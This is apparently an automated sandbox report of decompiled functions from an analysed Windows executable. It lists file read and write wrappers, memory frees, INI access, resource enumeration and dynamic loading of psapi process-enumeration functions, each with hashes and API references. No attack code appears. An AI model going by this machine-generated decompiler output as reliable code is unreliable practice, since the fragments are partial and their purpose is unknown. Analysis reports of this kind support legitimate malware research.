Instruction addresses: 0x00406729, 0x00406729, 0x00406729, 0x0040672d, 0x0040672f, 0x00406730, 0x00406735, 0x00406738, 0x0040673c, 0x0040673d, 0x0040673e, 0x00406743, 0x00406748, 0x0040674c

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                • Opcode ID: d04ff0e86415aacd890a32ca8a69411fdf4c08b78325983762dc897493c55298
                                                                                                                                                • Instruction ID: c90c2ba6e28998f2d5eed0bd3ccee310cae7302d4f530886d19d51dc87062eb8
                                                                                                                                                • Opcode Fuzzy Hash: d04ff0e86415aacd890a32ca8a69411fdf4c08b78325983762dc897493c55298
                                                                                                                                                • Instruction Fuzzy Hash: 1BD052B24102008BE3309F36C401726B2E8AF20726F208C2EE0D1E20C0EBB898508B18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040623E(intOrPtr* __esi) {
                                                                                                                                                
                                                                                                                                                				free( *(__esi + 0x10)); // executed
                                                                                                                                                				free( *(__esi + 0xc));
                                                                                                                                                				 *((intOrPtr*)(__esi)) = 0;
                                                                                                                                                				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                                                                				 *(__esi + 0xc) = 0;
                                                                                                                                                				 *(__esi + 0x10) = 0;
                                                                                                                                                				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                                                                                				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                                                                                				return 0;
                                                                                                                                                			}

Instruction addresses: 0x00406241, 0x00406249, 0x00406252, 0x00406254, 0x00406257, 0x0040625a, 0x0040625d, 0x00406260, 0x00406263

                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT(?,004064D9,74B04E00,?,00000000), ref: 00406241
                                                                                                                                                • free.MSVCRT(?,?,004064D9,74B04E00,?,00000000), ref: 00406249
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
                                                                                                                                                • Instruction ID: 28e7de91d8c6fb9b9a7e9865330149758d7ef971e5f4142975db03b93ce30916
                                                                                                                                                • Opcode Fuzzy Hash: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
                                                                                                                                                • Instruction Fuzzy Hash: 87D042B0904B008EC7B0DF3AD401A06BBF0BB083103108D3ED0EAD2A60EB75A0149F04
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

APIs
• GetPrivateProfileIntW.KERNEL32 ref: 0040D6B5
  • Part of subcall function 0040D51E: memset.MSVCRT ref: 0040D53D
  • Part of subcall function 0040D51E: _itow.MSVCRT ref: 0040D554
  • Part of subcall function 0040D51E: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040D563
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
• Opcode ID: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
• Instruction ID: 52ff98ee44e8e581f616b19192f74a8057abb6c9a5cdde8826008456e78d844a
• Opcode Fuzzy Hash: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
• Instruction Fuzzy Hash: E9E0B632400209BFCF126F94EC01AAA3F66FF04318F148469FD5C14561D3369574AF48
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 37%
			E0040D049(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E0040D071(__eax); // loads psapi.dll and fills the structure with GetProcAddress results (see the subcall APIs below)
				_t1 = _t10 + 0x14; // 0x8d000001
				_t6 =  *_t1; // function pointer stored at offset 0x14 of the structure
				if(_t6 == 0) {
					return 0; // export was not resolved: fail silently
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed; K32GetModuleFileNameExW(hProcess, NULL, lpFilename, MAX_PATH) per the API entry at ref 0040D068
				return _t8;
			}

Instruction addresses: 0x0040d04a, 0x0040d04c, 0x0040d051, 0x0040d051, 0x0040d057, 0x00000000, 0x0040d06c, 0x0040d068, 0x00000000

APIs
  • Part of subcall function 0040D071: LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,74B059F0,0040CF75,?,?), ref: 0040D07C
  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
  • Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0040CF75,00000104,0040CF75,?,?), ref: 0040D068
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$FileLibraryLoadModuleName
• String ID:
• API String ID: 3821362017-0
• Opcode ID: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
• Instruction ID: 2a72a0c1e2ab3da33e39831b93c2ef8746b4f49573bf5205cfb9ee226a22e14b
• Opcode Fuzzy Hash: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
• Instruction Fuzzy Hash: DBD02231B14300ABE330EAF08C00F4BA6D86F40B18F008C3AB189F70D0C6B4C809531A
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00405E43(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000; // lpNumberOfBytesRead, zeroed before the call
				_t8 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed; synchronous read (lpOverlapped = NULL) of _a12 bytes from handle _a4 into buffer _a8
				return _t8;
			}

Instruction addresses: 0x00405e47, 0x00405e5a, 0x00405e61

APIs
• ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
• Instruction ID: bef0590ae594767b07390076585e3b54dba5209a2ce075fea525828f997dfdeb
• Opcode Fuzzy Hash: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
• Instruction Fuzzy Hash: B7D0C93141020DFBDF01CF80DD06FDD7B7DFB04359F104064BA10A5060D7759A14AB94
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00405E62(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000; // lpNumberOfBytesWritten, zeroed before the call
				_t8 = WriteFile(_a4, _a8, _a12,  &_v8, 0); // executed; synchronous write (lpOverlapped = NULL) of _a12 bytes from buffer _a8 to handle _a4
				return _t8;
			}

Instruction addresses: 0x00405e66, 0x00405e79, 0x00405e80

APIs
• WriteFile.KERNELBASE(?,?,74B04E00,00000000,00000000,?,?,00409760,00000000,0040FF4C,00000002,?,?,00000001,0040BE1B,0040F454), ref: 00405E79
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
• Instruction ID: e108cc57461cd09051f83d149da4ae7cbb94a9151abf142b08e99a69ba8f508e
• Opcode Fuzzy Hash: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
• Instruction Fuzzy Hash: 9DD0C93101020DFBDF01CF80DD06FDD7B7DEB04359F104064BA00A5060C7B59A14AB54
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                			E00406710(signed int* __ecx) {
                                                                                                                                                				signed int _t3;
                                                                                                                                                
                                                                                                                                                				_t3 =  *__ecx;
                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                					_push(_t3); // executed
                                                                                                                                                					L0040E032(); // executed
                                                                                                                                                					 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                					__ecx[1] = __ecx[1] & 0x00000000;
                                                                                                                                                					return _t3;
                                                                                                                                                				}
                                                                                                                                                				return _t3;
                                                                                                                                                			}




                                                                                                                                                0x00406713
                                                                                                                                                0x00406717
                                                                                                                                                0x00406719
                                                                                                                                                0x0040671a
                                                                                                                                                0x0040671f
                                                                                                                                                0x00406722
                                                                                                                                                0x00000000
                                                                                                                                                0x00406726
                                                                                                                                                0x00406728

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 9bd186e89429b860fa5ddfbd94c8895d53f853a2d7264046d48f8f1e41839238
                                                                                                                                                • Instruction ID: 5339db72a64abfad3c15032fde593e64a1d815d69f9877ad78659c6e85a1ca85
                                                                                                                                                • Opcode Fuzzy Hash: 9bd186e89429b860fa5ddfbd94c8895d53f853a2d7264046d48f8f1e41839238
                                                                                                                                                • Instruction Fuzzy Hash: 13C012B28282214BE7345A29E80076262D89F14366F22082EE480A31C0DAB89C808658
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405351(WCHAR* _a4) {
                                                                                                                                                				void* _t3;
                                                                                                                                                
                                                                                                                                                				_t3 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                                                                                                                				return _t3;
                                                                                                                                                			}





                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
                                                                                                                                                • Instruction ID: 1e51560ea2d226d7cbdf2b9922d616c5fe3e6071316244dee5f443afb53d0edf
                                                                                                                                                • Opcode Fuzzy Hash: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
                                                                                                                                                • Instruction Fuzzy Hash: B1C092B0290200BEFE204A10AD0AF77355EE780700F1084307A00E80E1C2A14C058524
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405338(WCHAR* _a4) {
                                                                                                                                                				void* _t3;
                                                                                                                                                
                                                                                                                                                				_t3 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                				return _t3;
                                                                                                                                                			}





                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
                                                                                                                                                • Instruction ID: d588f5942abdbf62074f27fc8161704726317c11aca05e571d26f2c48b98c5da
                                                                                                                                                • Opcode Fuzzy Hash: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
                                                                                                                                                • Instruction Fuzzy Hash: B3C092B0280200BEFE224A10FD16F36355DE780700F2044347E00F80E0C1604E158524
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040DA82(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                                                
                                                                                                                                                				EnumResourceNamesW(_a4, _a8, E0040D9FC, 0); // executed
                                                                                                                                                				return 1;
                                                                                                                                                			}




                                                                                                                                                APIs
                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040D9FC,00000000), ref: 0040DA91
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                • Opcode ID: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
                                                                                                                                                • Instruction ID: 51e3a4b42ca36b746c75c5eb4a2aee4057f89303c93404922418ae0f581905ac
                                                                                                                                                • Opcode Fuzzy Hash: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
                                                                                                                                                • Instruction Fuzzy Hash: F5C09B3356438197C7119F508C09F1B7A95BB54705F504C397151A40E1C7714018A605
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040405E(void** __esi) {
                                                                                                                                                				void* _t1;
                                                                                                                                                				signed int* _t2;
                                                                                                                                                
                                                                                                                                                				_t2 = __esi;
                                                                                                                                                				_t1 =  *__esi;
                                                                                                                                                				if(_t1 != 0xffffffff) {
                                                                                                                                                					_t1 = FindCloseChangeNotification(_t1); // executed
                                                                                                                                                				}
                                                                                                                                                				 *_t2 =  *_t2 | 0xffffffff;
                                                                                                                                                				return _t1;
                                                                                                                                                			}






                                                                                                                                                APIs
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                • Opcode ID: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                • Instruction ID: 40547022017336ee125913f65e591b655fd6556432e54264b79cbfeb0dc3c2d4
                                                                                                                                                • Opcode Fuzzy Hash: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
                                                                                                                                                • Instruction Fuzzy Hash: ECB09270500541CBE6345F78884980A7AA4AA813703B44B28A1F6F10F2D33888468A14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E004057D1(WCHAR* _a4) {
                                                                                                                                                				long _t4;
                                                                                                                                                
                                                                                                                                                				_t4 = GetFileAttributesW(_a4); // executed
                                                                                                                                                				return 0 | _t4 != 0xffffffff;
                                                                                                                                                			}





                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                • Instruction ID: f1cceac889999bb919f5bca999730fd8e3c757b1acafb66fb331f39110631968
                                                                                                                                                • Opcode Fuzzy Hash: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
                                                                                                                                                • Instruction Fuzzy Hash: FFB012B52100014BCB1807349D4508D35905F44631B31873CB037D0CF0E730CCA8BA00
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 90%
E004048DA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, void** _a12) {
	intOrPtr _v8;
	intOrPtr _v12;
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr _t20;
	void* _t22;
	intOrPtr _t25;
	intOrPtr _t29;
	intOrPtr _t31;
	void* _t38;
	void** _t40;
	intOrPtr* _t47;

	_t38 = __edx;
	_t34 = __ecx;
	_push(__ecx);
	_push(__ecx);
	_t44 = _a4;
	_t40 = _a12;
	_t31 = 0;
	 *((intOrPtr*)(_a4 + 0x248)) = _t40;
	_v8 = 0;
	if( *((intOrPtr*)(_t40 + 0x428)) <= 0) { // entry count at _a12+0x428; nothing to search when zero
		L3:
		_t20 = 0;
		L4:
		if(_t20 != 0) { // a matching table entry was found
			_t22 = E00404489(_t44 + 0x14, _t34, _t38, _t40, _t20); // executed
			_t53 = _t22;
			if(_t22 != 0) {
				E00406729( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x418)) + 0xec)), _t44 + 4);
				_t47 = _a4;
				_t25 = E00404689(_a12, _t53,  *((intOrPtr*)(_t47 + 0x220)),  *((intOrPtr*)(_t44 + 4))); // executed
				 *_t47 = _t25;
				 *((intOrPtr*)(_t47 + 0x10)) = 1;
				_v8 = 1;
			}
		}
		return _v8;
	} else {
		goto L1;
	}
	while(1) {
		L1:
		_t29 = E00403F2B(_t31, _t40 + 0x41c); // fetch entry _t31 of the table at _a12+0x41c
		_push(_a8);
		_v12 = _t29;
		L0040E03E(); // case-insensitive string compare against _a8 (_wcsicmp per the APIs list below)
		_t34 = _t29;
		if(_t29 == 0) { // compare result 0: match, stop scanning
			break;
		}
		_t31 = _t31 + 1;
		if(_t31 <  *((intOrPtr*)(_t40 + 0x428))) {
			continue;
		}
		goto L3;
	}
	_t20 = _v12;
	goto L4;
}

Instruction addresses for the listing above (flattened from the report's side-by-side address column): 0x004048da 0x004048da 0x004048dd 0x004048de 0x004048e1 0x004048e5 0x004048e8 0x004048ea 0x004048f6 0x004048f9 0x00404923 0x00404923 0x00404925 0x00404927 0x0040492e 0x00404933 0x00404935 0x00404946 0x0040494d 0x00404959 0x0040495e 0x00404963 0x00404966 0x00404966 0x00404935 0x00404970 0x00000000 0x00000000 0x00000000 0x004048fb 0x004048fb 0x00404903 0x00404908 0x0040490b 0x0040490f 0x00404917 0x00404918 0x00000000 0x00000000 0x0040491a 0x00404921 0x00000000 0x00000000 0x00000000 0x00404921 0x00404973 0x00000000

APIs
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
• Opcode ID: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
• Instruction ID: fdc747c80fe88fd67bd043bcbe7cc9eb3f50563aa05d6d30472a65970944665d
• Opcode Fuzzy Hash: 1a5aa7950c8524b605f159770a309709ad0bf62fba3d30ff973a537a5b72f3ad
• Instruction Fuzzy Hash: 9D115EF5600205AFC710DF79C88099AB7B8FF48354F10453EEA55E3240D734A9508BA8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00403FDE(void** __eax, void* __eflags, WCHAR* _a4) {
	void* __ecx;
	void* __esi;
	intOrPtr _t11;
	void* _t14;
	intOrPtr _t15;
	intOrPtr* _t16;
	intOrPtr* _t22;

	_t22 = __eax;
	 *(__eax + 0x414) =  *(__eax + 0x414) & 0x00000000; // clear the stored error code
	E0040405E(__eax); // closes the previously held handle (FindCloseChangeNotification per the APIs list)
	_t11 = E00405338(_a4); // opens _a4 for reading (CreateFileW per the APIs list)
	 *_t22 = _t11;
	if(_t11 == 0xffffffff) { // INVALID_HANDLE_VALUE
		L7:
		 *((intOrPtr*)(_t22 + 0x414)) = GetLastError();
		L8:
		return 0;
	}
	_t14 = E00405E43(_t22 + 4, _t11, _t22 + 4, 0x400); // executed; reads a 0x400-byte header into _t22+4 (ReadFile per the APIs list)
	if(_t14 == 0) {
		goto L7;
	}
	_t15 =  *((intOrPtr*)(_t22 + 0x418));
	if( *((intOrPtr*)(_t15 + 4)) == 0x89abcdef) { // signature check on the header just read
		_t16 = _t15 + 0xec;
		__eflags =  *_t16;
		if(__eflags == 0) {
			 *_t16 = 0x1000; // default applied when the header field at +0xec is zero
		}
		E00404541(__eflags, _t22); // executed
		return 1;
	}
	 *((intOrPtr*)(_t22 + 0x414)) = 0xfff1; // error code recorded on signature mismatch
	goto L8;
}

Instruction addresses for the listing above (flattened from the report's side-by-side address column): 0x00403fe0 0x00403fe2 0x00403fe9 0x00403ff2 0x00403ffb 0x00403ffd 0x0040404b 0x00404051 0x00404057 0x00000000 0x00404057 0x00404009 0x00404013 0x00000000 0x00000000 0x00404015 0x00404022 0x00404030 0x00404035 0x00404038 0x0040403a 0x0040403a 0x00404041 0x00000000 0x00404048 0x00404024 0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040405E: FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066
                                                                                                                                                  • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00403B9A,?), ref: 0040404B
                                                                                                                                                  • Part of subcall function 00405E43: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
Similarity
• API ID: File$ChangeCloseCreateErrorFindLastNotificationRead
• String ID:
• API String ID: 4176926985-0
• Opcode ID: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
• Instruction ID: 1be67c3d07cfbe594be31b534527c337e1243451ed86295bd1db7fefa69627cd
• Opcode Fuzzy Hash: 28e05b3785312bd73728d28a7b4e7de4c452789e56a0673e54d11ff134628f3e
• Instruction Fuzzy Hash: FD01D1F10016008AD320AB20C805B9376E8DF91315F10893FE3A6F72C1EB7C98818AA9
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406355(signed int* __esi) {
    void* _t5;
    signed int* _t7;

    _t7 = __esi;
    _t5 = *__esi;
    if(_t5 != 0) {
        free(_t5); // executed
        *__esi = *__esi & 0x00000000;
    }
    _t7[1] = _t7[1] & 0x00000000;
    _t7[2] = _t7[2] & 0x00000000;
    return _t5;
}

APIs
